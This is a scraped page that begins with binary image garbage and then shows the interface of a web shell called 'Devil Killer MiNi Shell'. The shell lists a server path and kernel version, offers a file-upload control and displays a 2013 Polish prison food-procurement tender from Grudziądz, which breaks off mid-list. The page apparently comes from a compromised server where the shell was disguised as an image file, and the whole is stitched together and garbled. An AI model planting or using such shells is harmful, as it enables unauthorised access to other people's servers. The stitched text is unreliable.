JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/84123-N-2013.html

<p class="kh_header"><b>Grudziądz: Dostawy  różnych artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 84123 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Nr 1 , ul. Wybickiego 10/22, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 64 40 400, faks 56 64 40 499.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy  różnych artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZ. I    ARTYKUŁY ZBOŻOWE 

Lp.	Nazwa artykułu	CPV  Norma  Ilość  ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo
 - mącznych i innych pozostałości	15612100-2 PN-A-74022 8 000 kg 4050 kg 827 kg	12 877 kg
2.Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi 
ziemniaczanej;
- postać i barwa - biały proszek; 15623000-1	PN-A-74710  30 kg	  __ __	30 kg
3.Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg; 15851100-2 PN-A-74131 7 000 kg 1150 kg 667 kg 8817 kg
4.Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg; 15613100-8 PN-887A-7403	2 000 kg	1570 kg	140 kg3710 kg
5.Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych 
pozostałości;  15613100-8	PN-88/A-74203	2 000 kg	550 kg	20 kg	2570 kg
6. Ryż biały: - opakowanie - 1 kg - 25 kg; 15614100-6 PN-A-74220 4 000 kg	 1290 kg 472 kg	5762 kg
7. Makaron:
- typu nitki
- opakowanie - 1 kg - 25 kg; 15851100-2 PN-A-74131 ____ 1100 kg _____1100 kg

CZ. II   BULIONY 
Lp.Nazwa artykułu CPV Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15892000-7 PN-A-75980:1997 1200 kg _ _ 1200 kg
2. Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15891500-5 PN-A-97052 700 kg  ____300 kg 1000 kg
3.Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy	15891500-5 PN-A-94050 10 kg ____	____ 10 kg
4. Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy	15891400-4 PN-A-94050:1996 200 kg	___ __   200 kg
5.Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy	15891400-4 PN-A-94050 200 kg  270 kg 10 kg	480 kg
6. Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy	15890000-3 PN-A-94052 1 500 l 540 l 156 l  2196 l
7.Przyprawa jarzynka w proszku
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy 15871270-7  PN-A-86967 ___1010 kg ___1010 kg
8. Zupa pieczarkowa w proszku 
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 6 m-cy od daty dostawy	
  15891400-4	PN-A-94050:1996	_____	58 kg	_____	58 kg
9.Leczo pieczarkowe w słoikach
- opakowanie od 3 do 4,2 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy	15331000-7 PN-A-86951:2006 ___ 910 kg __	910 kg
10.Bulion z kury w proszku
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy	15891500-5  PN-A-94052:1996 ___  1370 kg__1370 kg

Cz. III  CUKIER 
Lp.Nazwa artykułu	CPV	Norma	Ilość ZK Nr 1  ZK Nr 2  AŚ	 RAZEM
1.Cukier biały kryształ:
- opakowanie max. do 25 kg
- termin przydatności do spożycia - 
co najmniej 6 m-cy od daty dostawy	
15831200-4       PN-A-74850      3 000 kg    3980 kg      750 kg	   7730 kg

CZ. IV  RÓŻNE ARTYKUŁY SPOŻYWCZE I PRZYPRAWY 
Lp. Nazwa artykułu	CPV	Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia 
- 6 m-cy od daty dostawy;	15831000-2 BN-79-8133-01	50 kg __	__50 kg
2.Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15613311-1PN-A-88036:1998200 kg	______	200 kg
3.Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15871200-6 PN-R-87022 20 kg 2 kg	8 kg	30 kg
4.Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia -
 6 m-cy od daty dostawy;	15882000-4  PN-A-88115:1998  150 kg ___ ___	150 kg
5.Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15620000-0 PN-A-94051 200 kg  ___	____ 200 kg
6.Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	15871000-4  PN-A-86967  30 kg  5 kg	_____ 35 kg
7.Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia -
 6 m-cy od daty dostawy;	15833100-7  PN-94/A-75104	  100 kg	____ ___100 kg
8.Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; 15863000-5  PN-ISO 3720  800 kg 280 kg 60 kg 1140 kg
9.Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; 15861000-1 PN-A-94013 1 700 kg 490 kg 115 kg 2305 kg
10.Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; 15620000-0	 PN-A-94051 200 kg 100 kg	_____	300 kg
11.Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15890000-3	PN-81/A-79734	50 kg	20 kg	_____	70 kg
12.Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15871000-4	PN-R-87022	40 kg	20 kg	8 kg	68 kg
13.Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15872000-1 PN-A-86958	40 kg	30 kg	8 kg	78 kg
14.Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871273-8 PN-A-86950:1995	900 kg	_____	25 kg	925 kg
15. Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871250-1 PN-A-86964	1 200 kg	130 kg	35 kg	1365 kg
16. Ocet 10% 0,5 l	15871120-1	PN-72/A-79733	500 l	200 l	36 l 736l
17.Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4   PN-A-86955	20 kg	40 kg	8 kg	68 kg
18.Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15872100-2  PN-A-86965  100 kg	50 kg	17 kg	167 kg
19.Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15899000-6  PN-A-94017:1998	20 kg	____	____	20 kg
20.Sól kuchenna:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15872400-5  PN-C-84081	3 500 kg	1060 kg	270 kg	4830 kg
21.Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7  BN-67/8132-14	40 kg	20 kg	15 kg	75 kg
22.Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15892000-7  PN-A-82245:1993	50 kg	____	____  50 kg
23.Bazylia suszona
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15872000-1  PN-A-86959:1997	_____	4 kg  ____   4 kg
24.Chilli mielone
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7  PN-A-86967   _____	2 kg	____	2 kg
25.Cynamon mielony
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy  15872200-3	BN-68-8132-09	______	1 kg	_____	1 kg
26. Kminek 
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15872000-1  PN-A-86953 	______	4 kg	_____	4 kg
27.Oregano suszone
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy  15872300-4	PN-A-86967	_____	4 kg	____	4 kg
28.Papryka słodka mielona
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15890000-3  PN-A-86955  ______	40 kg	____	40 kg
29. Przyprawa do mięsa mielonego
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15871270-7  PN-A-86967	______	6 kg	_____	6 kg
30.Zioła prowansalskie 
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15872000-1  PN-A-86967	_______	2 kg	____	2 kg
31. Chrzan tarty
- opakowanie - do 0,9 kg
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15871000-4  PN-R-75520:1993	______	80 kg	____	80 kg

CZ. V   PRODUKTY SOJOWE 
Lp. Nazwa artykułu	CPV	Norma	Ilość ZK nr 1	ZK Nr 2	AŚ	RAZEM
1. Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3  PN-ISO 5506	600 kg	55 kg	70 kg	725 kg
2.Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3  PN-ISO 5506	500 kg	85 kg	30 kg	615 kg
3.Kotlet sojowy
- opakowanie - 1 kg - 30 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3  PN-ISO 5506  ____	  80 kg	20 kg	100 kg

CZ. VI   PRODUKTY STRĄCZKOWE 
Lp.Nazwa artykułu	CPV	Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15331130-7  PN-75/R-65031	2 500 kg	1225 kg	190 kg	3915 kg
2.Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15311133-8  PN-A-74220:1997	2 500 kg	680 kg	90 kg	3270 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.00-2, 15.61.31.00-8, 15.61.41.00-6, 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3, 15.87.12.70-7, 15.83.12.00-4, 15.83.10.00-2, 15.61.33.11-1, 15.87.12.00-6, 15.88.20.00-4, 15.62.00.00-0, 15.87.10.00-4, 15.83.31.00-7, 16.86.30.00-5, 15.86.10.00-1, 15.62.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl-link zamówienia publiczne,OISW w Bydgoszczy, Zakład Karny Nr 1 w Grudziądzu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 1 ul. Wybickiego 10/22, 86-300 Grudziądz -Dział Kwatermistrzowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 11:30, miejsce: Zakład Karny Nr 1 ul. Wybickiego 10/22, 86-300 Grudziądz sekretariat budynku w administracji-I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZ. I    ARTYKUŁY ZBOŻOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa artykułu	Norma	Ilość  ZK Nr 1	ZK Nr 2	AŚ	RAZEM

1.Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo
 - mącznych i innych pozostałości PN-A-74022 8 000 kg  4050 kg 827 kg 12 877 kg
2.Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi 
ziemniaczanej;
- postać i barwa - biały proszek; PN-A-74710	30 kg ____  ____	30 kg
3.Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg;  PN-A-74131 7 000 kg  1150 kg 667 kg  8817 kg
4.Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg; PN-887A-7403 2 000 kg 1570 kg 140 kg 3710 kg
5.Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych 
pozostałości; PN-88/A-74203 2 000 kg 550 kg	20 kg	2570 kg
6.Ryż biały: - opakowanie - 1 kg - 25 kg; PN-A-74220 4 000 kg	1290 kg	472 kg5762 kg
7.Makaron:
- typu nitki
- opakowanie - 1 kg - 25 kg;   PN-A-74131 ____1100 kg	_____ 1100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.00-2, 15.61.31.00-8, 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> BULIONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa artykułu	 	Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-A-75980:1997	1 200 kg	____ ____ 1200 kg
2.Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	PN-A-97052 700 kg ___300 kg   1000 kg
3.Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-94050	10 kg	______	____	10 kg
4.Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy  PN-A-94050:1996	200 kg	_____ ____ 200 kg
5.Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-94050	200 kg	270 kg	10 kg	480 kg
6.Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-94052	1 500 l	540 l	156 l	2196 l
7.Przyprawa jarzynka w proszku
- opakowania od 5 - 35 kg 
